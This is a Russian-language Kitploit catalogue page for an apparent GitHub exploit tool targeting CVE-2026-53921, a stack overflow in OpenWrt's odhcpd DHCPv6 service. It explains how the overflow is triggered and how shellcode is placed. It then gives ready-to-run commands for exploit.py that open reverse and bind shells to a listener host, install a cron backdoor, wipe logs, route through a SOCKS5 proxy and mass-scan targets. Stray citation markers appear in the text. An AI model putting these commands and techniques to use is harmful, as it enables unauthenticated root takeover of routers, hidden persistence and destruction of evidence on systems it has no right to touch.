Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-53921-PoC-Exploit — CVE-2026-53921 – переполнение стека odhcpd (CVSS 9.8) 🛡️ Подробный и всесторонний разбор уязвимости, верификатор и мультиэксплойт для RCE через DHCPv6 в OpenWrt. Двухвекторное (IA_NA/IA_PD) переполнение с shellcode для MIPS/ARM, ROP-цепочки, SOCKS5-прокси, персистентность, затирание логов и массовое сканирование. Используйте этично, оставайтесь в рамках закона. 🔒 | Kitploit
Инструменты/GitHubGitHub/tc4dy/cve-2026-53921-poc-exploit
Безопасность встроенных системРазведкаФреймворки для эксплойтовБезопасность IoTАнализ уязвимостейЭксплуатацияПост-эксплуатацияRed TeamingГенерация Шеллкода

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

CVE-2026-53921 – переполнение стека odhcpd (CVSS 9.8) 🛡️ Подробный и всесторонний разбор уязвимости, верификатор и мультиэксплойт для RCE через DHCPv6 в OpenWrt. Двухвекторное (IA_NA/IA_PD) переполнение с shellcode для MIPS/ARM, ROP-цепочки, SOCKS5-прокси, персистентность, затирание логов и массовое сканирование. Используйте этично, оставайтесь в рамках закона. 🔒

Разработка Полезной Нагрузки
Эксплуатация Бинарных Файлов
GitHubtc4dy/cve-2026-53921-poc-exploit

CVE-2026-53921-PoC-Exploit

Репозиторий
671 месяц назадЕщё не проверено
Поделиться

CVE-2026-53921

CVE-2026-53921 – переполнение стека в odhcpd

CVE CVSS OpenWrt

⚠️ Только для образовательных целей и авторизованного тестирования. Несанкционированное использование незаконно.


📖 Обзор уязвимости

CVE-2026-53921 — это критическое переполнение буфера стека в демоне odhcpd проекта OpenWrt — стандартном сервере DHCPv6/DHCPv4/RA.

🔍 Как это работает

Уязвимость существует в коде обработки сообщений DHCPv6 демона odhcpd, а именно в функциях build_ia() и dhcpv6_ia_handle_IAs().

Техническое погружение

1. Корневая причина

Ошибка возникает во время сериализации (упаковки) ответных пакетов DHCPv6. Когда odhcpd отвечает на запросы клиентов, он формирует ответ в стековом буфере фиксированного размера 512 байт без надлежащей проверки границ.

root@kitploit:~
// Simplified representation of the vulnerable code

static void build_ia(struct dhcpv6_ia *ia, uint8_t *buf, size_t *len) {
    // ❌ No bounds check before writing
    memcpy(buf + *len, ia->data, ia->length);
    *len += ia->length;
}

2. Инициирование переполнения

Злоумышленник отправляет DHCPv6 Request (или Solicit) со следующими параметрами:

  • 5 или более опций IA_NA (Identity Association for Non-temporary Address), каждая из которых содержит суб-опцию IAAddress.
  • 22 или более опций IA_PD (Identity Association for Prefix Delegation).

Каждая опция потребляет место в стеке при формировании ответа odhcpd. Накопленные данные превышают 512 байт, что вызывает переполнение.

3. Два вектора переполнения


Вектор Триггер Точка переполнения


Вектор 1 5 опций IA_NA build_ia() для IA_NA с IPv6-адресами

Вектор 2 22 опции IA_PD build_ia() для IA_PD

Корневая причина идентична, но переполнение возникает в разных участках кода, поэтому оба вектора одинаково эксплуатируемы.

4. Раскладка памяти

root@kitploit:~
Stack Layout (simplified):

+-------------------+  <-- High addresses
|    Return Address |  ← Overwritten with attacker-controlled value
+-------------------+
|  Saved Frame Ptr  |
+-------------------+
|  Local Variables  |  ← 512-byte buffer
+-------------------+  <-- Low addresses

Злоумышленник перезаписывает сохранённый адрес возврата, чтобы он указывал на его шеллкод в памяти.

5. Требования для эксплуатации


Требование Описание


Сетевой доступ Злоумышленник должен иметь IPv6-связность с целью

Аутентификация Не требуется — атака без аутентификации

Привилегии odhcpd работает от root, поэтому RCE даёт полный контроль над системой

Целевой сервис Порт UDP 547 (DHCPv6) должен быть открыт

6. Размещение шеллкода

В реальном эксплойте шеллкод злоумышленника размещается в полях IPv6-адреса IAAddress (16 байт на каждую IA_NA). Сформированные пакеты упаковывают шеллкод, NOP-слайд и адрес возврата в эти поля.

root@kitploit:~
Crafted IA_NA Structure:

+-------------------+
| IA_NA Header      | (12 bytes)
+-------------------+
| IAAddress 1       | ← NOP sled + shellcode
+-------------------+
| IAAddress 2       | ← NOP sled + shellcode
+-------------------+
| IAAddress 3       | ← NOP sled + shellcode
+-------------------+
| IAAddress 4       | ← Return address
+-------------------+
| IAAddress 5       | ← Return address
+-------------------+

7. Цепочка воздействия

root@kitploit:~
Crafted DHCPv6 Request
         ↓
odhcpd processes IA_NA/IA_PD options
         ↓
512-byte stack buffer overflows
         ↓
Return address overwritten
         ↓
CPU jumps to shellcode
         ↓
Reverse shell / Bind shell / RCE
         ↓
Full system compromise (root privileges)

8. Векторы атаки и статус исправления

Версия Статус Возможен ли RCE?


odhcpd < e432dd6 Уязвим ✅ Да OpenWrt < 24.10.8 Уязвим ✅ Да OpenWrt < 25.12.5 Уязвим ✅ Да OpenWrt 24.10.8+ Исправлено ❌ Нет OpenWrt 25.12.5+ Исправлено ❌ Нет odhcpd master + e432dd6 Исправлено ❌ Нет

9. Реальная эксплуатация

Эта уязвимость особенно опасна, потому что:

  • odhcpd включён по умолчанию в установках OpenWrt.
  • Аутентификация не требуется — любое устройство в том же IPv6-сегменте может атаковать.
  • Ошибка находится в пути обработки запросов.
  • Stack-канарейки и ASLR редко присутствуют на встраиваемых устройствах MIPS/ARM.
  • Эксплойт может обходить распространённые защиты во многих встраиваемых средах.

🎯 Затронутые версии

КомпонентУязвимые версииИсправлено в
odhcpd (ветка master)до коммита e432dd6e432dd6 или новее
Релизы OpenWrt< 24.10.8
< 25.12.5

🧰 Инструменты

Этот репозиторий содержит два независимых скрипта:

СкриптНазначениеЭксплойт-кодБезопасность
verifier.pyНеинвазивная проверка уязвимости❌ Нет✅ Безопасно
exploit.pyПолноценный боевой эксплойт

🔎 verifier.py — Проверка уязвимости

  • Отправляет стандартный DHCPv6 Solicit для проверки активности сервиса.
  • Читает баннеры HTTP/SSH для определения версии OpenWrt.
  • Сравнивает версию с известным уязвимым диапазоном.
  • Не отправляет ни полезной нагрузки переполнения, ни шеллкода.

💥 exploit.py — Полный эксплойт

  • Двойные векторы переполнения: IA_NA (Site1) и IA_PD (Site2).
  • Автоматическое определение архитектуры (MIPS / ARM).
  • Reverse и bind шеллкод для MIPS big-endian.
  • Поддержка SOCKS5-прокси.
  • Постоянство (бэкдор через cron) и очистка логов.
  • Многопоточное сканирование и массовая эксплуатация.
  • Дополнительное кодирование полезной нагрузки (XOR).

🚀 Установка

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-53921-PoC-Exploit
cd CVE-2026-53921-PoC-Exploit
pip install -r requirements.txt
#Note: Both scripts need root privileges to craft raw IPv6 packets.

📝 Использование

🔍 Verifier — проверка, уязвима ли цель

root@kitploit:~
sudo python3 verifier.py -u fe80::1%eth0 -i eth0

💥 Exploit — получение reverse shell (не используйте для незаконной деятельности, только для тестирования)

root@kitploit:~
sudo python3 exploit.py -u fe80::1%eth0 -i eth0 --lhost 192.168.1.100 --lport 4444

⚙️ Параметры командной строки

verifier.py

АргументОписание
-u, --targetIPv6-адрес цели (обязательно)
-i, --ifaceСетевой интерфейс (по умолчанию: eth0)

exploit.py

🧪 Примеры сценариев

1. Сканирование списка целей

root@kitploit:~
sudo python3 exploit.py -l targets.txt --scan-only --threads 10
root@kitploit:~
### 2. Exploit a single target with bind shell
root@kitploit:~
sudo python3 exploit.py -u fe80::1%eth0 --lhost 192.168.1.100 --payload bind --lport 31337
root@kitploit:~
### 3. Use SOCKS5 proxy + persistence + log wiping
root@kitploit:~
sudo python3 exploit.py -u fe80::1%eth0 --lhost 192.168.1.100 --proxy-host 127.0.0.1 --proxy-port 9050 --persistence --clear-logs

🛡️ Меры защиты

Обновите OpenWrt до 24.10.8 или 25.12.5 или новее.

root@kitploit:~
opkg update
opkg upgrade odhcpd

📌 Ссылки

Официальные источники

  • Рекомендации по безопасности OpenWrt (GHSA-7fwx-hhrg-3496) https://github.com/openwrt/odhcpd/security/advisories/GHSA-7fwx-hhrg-3496 Подробные рекомендации, охватывающие оба вектора переполнения в odhcpd.

  • Запись CVE-2026-53921 в NVD https://nvd.nist.gov/vuln/detail/CVE-2026-53921 Официальная запись в базе уязвимостей NIST.

  • Примечания к выпуску OpenWrt 24.10.8 https://forum.openwrt.org/t/openwrt-24-10-8-service-release/252195 Официальное объявление о выпуске ветки 24.10.

  • Примечания к выпуску OpenWrt 25.12.5 https://lists.openwrt.org/pipermail/openwrt-announce/2026-June/000088.html Официальное объявление о выпуске ветки 25.12.

Связанные CVE, исправленные в том же выпуске

Выпуски 24.10.8 и 25.12.5 устраняют несколько уязвимостей odhcpd помимо CVE-2026-53921 [citation:9]:

Технический анализ и статьи

  • Анализ The Hacker News https://thehackernews.com/2026/07/critical-openwrt-dhcpv6-flaw-could-let.html Подробный технический разбор уязвимости и векторов эксплуатации. [citation:1]

  • PoC-репозиторий на GitHub https://github.com/0xBlackash/CVE-2026-53921 Публичные proof-of-concept реализации и технические детали. [citation:3]

Дополнительные исправления безопасности в 25.12.5

Версия 25.12.5 также устраняет уязвимости в других ключевых компонентах [citation:10]:

  • uhttpd: контрабанда HTTP-запросов (CVE-2026-55612, CVE-2026-55614)
  • LuCI: множественные уязвимости повышения привилегий и XSS
  • cgi-io: аутентифицированный обход пути
  • Linux Kernel: обновлён до 6.12.94 с исправлением множества CVE
  • OpenSSL: обновлён до 3.5.7 с устранением многочисленных CVE
  • Dropbear SSH: исправлены CVE-2019-6111 и CVE-2026-35385

Дополнительная документация

  • Выбор прошивки OpenWrt https://firmware-selector.openwrt.org/ Скачайте исправленные образы прошивки для вашего устройства.

  • Каталог известных эксплуатируемых уязвимостей CISA https://www.cisa.gov/known-exploited-vulnerabilities-catalog Проверьте, добавлен ли CVE-2026-53921 в KEV (по состоянию на 27 июля 2026 года не указан). [citation:1]

Скачать инструмент
24.10.8 и 25.12.5
✅ Да
⚠️ Опасно
АргументОписание
-u, --targetIPv6-адрес цели
-l, --listФайл со списком целей
-i, --ifaceСетевой интерфейс (по умолчанию: eth0)
--lhostIP слушателя (обязательно)
--lportПорт слушателя (по умолчанию: 4444)
--vectorsite1, site2 или both (по умолчанию: both)
--offsetСмещение в стеке (по умолчанию: 512)
--retАдрес возврата в hex (например, 0x7ffff000)
--archПринудительно mips или arm (автоопределение, если не указано)
--payloadreverse или bind (по умолчанию: reverse)
--encodenone или xor (по умолчанию: none)
--proxy-hostIP SOCKS5-прокси
--proxy-portПорт SOCKS5-прокси (по умолчанию: 1080)
--persistenceУстановить бэкдор через cron
--clear-logsОчистить syslog после эксплуатации
--scan-onlyТолько сканировать цели, не эксплуатировать
--threadsКоличество потоков для сканирования (по умолчанию: 5)
--verboseПодробное логирование
CVE IDСерьёзностьОписание
CVE-2026-53918ВысокаяИспользование после освобождения (use-after-free) в обработчике DHCPv6 IA [citation:4][citation:9]
CVE-2026-53920ВысокаяРаскрытие памяти стека через усечённую опцию DHCPv6 IA_NA/IA_PD [citation:9]
CVE-2026-53922УмереннаяОтказ в обслуживании до аутентификации из-за переполнения size_t (underflow) [citation:9]
CVE-2026-55606УмереннаяЧтение за пределами стекового буфера из-за несоответствия порядка байтов в длине DUID [citation:9]
CVE-2026-62948-Внедрение имени хоста в DHCPv6, приводящее к сохранённому XSS [citation:1]
CVE-2026-62947-Аутентифицированный обход пути (path traversal) в cgi-io [citation:1]